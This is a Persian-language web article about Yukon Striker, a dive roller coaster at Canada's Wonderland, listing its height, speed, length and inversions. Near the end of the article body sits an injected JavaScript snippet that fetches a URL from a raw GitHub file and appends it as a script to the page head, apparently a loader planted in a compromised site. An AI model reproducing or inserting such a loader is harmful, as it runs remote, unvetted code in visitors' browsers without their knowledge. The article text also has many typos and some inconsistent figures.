طولانی ترین و پر سرعت ترین ترن هوای جهان

  • پر سرعت ترین ترن هوای دنیا

    بیشتر افراد نیاز به تفریح و سرگرمی دارن و دوست دارند آخر هفته به یک مکانی بروند مثل شهر بازی ها. یکی از هیجان انگیز ترین وسایل شهر بازی ها انواع ترن ها هستند مثل ترن U ، ترن هوایی و … که هرچی بلند تر باشه هیجان آن ها زیاد است. یکی از بزرگ ترین ترن های هوایی دنیا در کشور کانادا قرار دارد.

    پر سرعت ترین ترن هوای

    شهر بازی ها را نمی توان بدونه ترن ها ، هیجان انگیز تصور کرد. ترن ها وسایلی بسیار هیجان انگیز هستند برای استفاده از آنها باید کمی نترس باشید! در ترن ها سرعت تغییرات سریع ارتفاع و سرعت افتادن در قسمت های ترس از سوقط برای شما ایجاد می کنند و شما به طور غیر ارادی جیغ می زنید.

    برخی از ترن های هوای با ویزگی های خاصی در دنیا محبوب شده اند و ماجراجویانی زیادی آرزو دارن آنها را تجربه کنند. در اویل سال 2019 یکی از هیجان انگیز ترین ترنه هوایی افتتاح شد. کانادا یکی از طولانی ترین و شریجه زن تریت ترن دنیا را که با سرعت 130 کیلومتر بر ساعت سریع ترین ترن هوای دنیا دارد. که بعد از 10 ما برنامه ریزی در اویل ژانویه 2018 مجوز ساخت این ترن هوای جدید صادر سد و در 15 آگوست سال 2018 مسئولین پارک با این خبر هیجان انگیز شدند.

    ویژگی های پر سرعت ترین ترن هوای دنیا یوکون استریکر ( Yukon Striker )

    • مرتفع ترین ترن هوایی شیرجه زن: 75 متر
    • سریع ترین ترن هوایی شیرجه زن: 130 کیلومتر
    • طولانی ترین ترن هوایی شیرجه زن: 1105 متر
    • بیشترین تعداد وارونگی ترن: 4 بار

    این ترن گاهی به مسیر های به طول 1.2 کیلومتر می رسد که در ارتفاع 75 متری می باشد. در ایت ترن یک سقوط عمودی کامل دارد تا لحظاتی از حس سقوط آزاد در شما بوجود می آورد. 3 ثانیه مکثی که در بالای بالای ترن هوایی ایجاد می شود طولانی ترین « 3 ثانیه » زندگی تان خواهد بود چون از شروع کار 3 ثانیه در زاویه بیشتر از 90 درجه آویزان می شوید و ناگهان شیرجه می زند به سمت یک تونل.

    و پس از بلند 75 متری و از زاویه 90 درجه سقوط کردید این حس به شما دست می دهد که انگار از لب صندلی ها معلق شده اید. ترن بد از آغاز حرکت به داخل یک تونل به زیر آب می رود و سرعت از صفر به 130 کیلومتر بر ساعت می رسد. وحالا نوبت به بالا رفتن از یک ریل فولادی و گذر از 4 پیچ 360 درجه است؛ در اینجا بخاطر بی وزنی که از گرانش ناشی می شود به جلو سقوط داده می شوید. به گفته مدیران پارک این ترن هوایی بزرگ ترین پروژه انجام شده در این شهربازی است و در آن ویژگی های خاص و منحصربفردی به کاررفته که نمونه این ترن را در هیچ ترن های دیگر سراغ ندارید.

    پارک سرزمین عجایب کانادا ۳۳۰ هکتار مساحت دارد و در اوایل دهه ۱۹۸۰ در ۴۰ کیلومتری تورنتو افتتاح شده است.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید